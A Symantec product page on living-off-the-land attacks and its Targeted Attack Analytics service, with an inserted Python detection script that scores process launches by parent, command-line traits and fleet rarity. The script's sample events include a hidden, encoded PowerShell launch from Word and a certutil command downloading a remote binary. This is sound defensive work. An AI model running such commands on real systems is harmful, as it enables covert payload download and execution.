As enterprise security teams shore up defenses against malware, ransomware, and other external threats, and use existing tools to patch vulnerabilities, attackers are shifting their attack strategy from zero-day exploits (which have become too costly and complex) to ‘living off the land’ techniques. In fact, the Symantec 2018 Internet Security Threat Report, Volume 23 (ISTR 23) notes that only 27 percent of the 140 Symantec-tracked attack groups used zero-day vulnerabilities. Existing security prevention tools cannot block sophisticated, previously unknown living off the land attacks that use tools already on the targeted system. By using clean system tools and dropping as few files as possible, attackers avoid being blocked or caught by traditional scanners and security measures. Memory-only attacks are even harder to detect, as they leave very little evidence in their wake. The only defense is a more holistic approach, one that uses both global and local context informed by attack analytics, continuously enhanced and bolstered with new analytics. The solution should address both insider and external actors.
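The paragraph above argues that living off the land activity cannot be blocked by a scanner because the tool is legitimate, and that detection has to come from local and global context instead. The following Python script, an added illustration that is not part of the original page and not Symantec's TAA logic, shows what that means in practice: each process-creation event is scored on local context (which parent launched a built-in tool, and whether its command line hides or encodes what it runs) and on global context (how rare that parent/child pairing is across the whole fleet). The tool lists, score weights, thresholds, host names and log events are all constructed assumptions for the example.

```python
"""Toy scorer for living-off-the-land (LotL) tool abuse in process logs.

Added illustration only; not Symantec's TAA implementation. It combines
local context (which parent launched a built-in tool, and with what
command line) with global context (how rare that parent/child pairing is
across all hosts in the sample). Tool lists, thresholds, hosts and events
are constructed assumptions for the example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Built-in Windows tools present on every host and therefore attractive
# for LotL activity (assumption: a short illustrative list, not exhaustive).
SYSTEM_TOOLS = {
    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "certutil.exe", "regsvr32.exe", "rundll32.exe",
}

# Parents from which launching a system tool is rarely legitimate
# (assumption: document and mail handlers).
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}

# Command-line traits that keep activity off disk or pull remote content.
CMDLINE_TRAITS = {
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "remote_content": re.compile(r"https?://", re.I),
    "download_verb": re.compile(r"downloadstring|downloadfile|-urlcache", re.I),
}


@dataclass(frozen=True)
class Event:
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    host: str
    parent: str
    image: str
    score: int
    reasons: list = field(default_factory=list)


def pair_prevalence(events):
    """Global context: fraction of hosts on which each (parent, child) pair occurs."""
    hosts_per_pair = defaultdict(set)
    all_hosts = set()
    for e in events:
        hosts_per_pair[(e.parent.lower(), e.image.lower())].add(e.host)
        all_hosts.add(e.host)
    return {pair: len(h) / len(all_hosts) for pair, h in hosts_per_pair.items()}


def score_events(events, rare_fraction=0.2, alert_threshold=4):
    """Score system-tool launches; return findings at or above the threshold, highest first."""
    prevalence = pair_prevalence(events)
    findings = []
    for e in events:
        parent, image = e.parent.lower(), e.image.lower()
        if image not in SYSTEM_TOOLS:
            continue  # ordinary binary; nothing to score here
        score, reasons = 0, []
        if parent in DOCUMENT_HANDLERS:          # local context: unusual parent
            score += 3
            reasons.append(f"spawned by document handler {parent}")
        for name, pattern in CMDLINE_TRAITS.items():  # local context: command line
            if pattern.search(e.cmdline):
                score += 2
                reasons.append(name)
        share = prevalence[(parent, image)]      # global context: fleet rarity
        if share <= rare_fraction:
            score += 2
            reasons.append(f"pair seen on {share:.0%} of hosts")
        if score >= alert_threshold:
            findings.append(Finding(e.host, parent, image, score, reasons))
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample process-creation events (five hosts).
SAMPLE_EVENTS = [
    Event("ws-01", "explorer.exe", "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    Event("ws-02", "explorer.exe", "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    Event("ws-03", "explorer.exe", "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    Event("ws-04", "explorer.exe", "powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    Event("ws-03", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    Event("ws-05", "winword.exe", "powershell.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    Event("ws-02", "explorer.exe", "certutil.exe",
          r"certutil.exe -urlcache -split -f http://example.invalid/a.bin C:\Users\Public\a.bin"),
]

if __name__ == "__main__":
    for f in score_events(SAMPLE_EVENTS):
        print(f"{f.host}: {f.parent} -> {f.image} score={f.score} ({'; '.join(f.reasons)})")
```

The routine scheduled backup script scores nothing even though it is the same PowerShell binary, because its parent/child pairing is common across hosts and its command line has none of the evasive traits; the two launches that combine an unusual parent or download behaviour with fleet rarity are the ones surfaced. Real deployments tune the lists, weights and rarity threshold to their own baseline rather than using these constructed values.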
Symantec Targeted Attack Analytics (TAA), built on big data analytics and targeted attack research, together with Endpoint Detection and Response (EDR), supplements existing security tools, enabling enterprises to expose previously unknown attacks. Only Symantec brings together rich telemetry, artificial intelligence, advanced machine learning, and research expertise to identify hard-to-detect attacks with high confidence (at both the machine and enterprise levels). Our massive, high-quality dataset, machine learning technologies, and collective research expertise give Symantec customers unparalleled, tailored, and prioritized incident notification with clear recommendations for response and remediation. Delivered as a cloud service, TAA enables new and enhanced analytics to be delivered continually to our EDR customers (using Advanced Threat Protection: Endpoint) without the need for ongoing updates.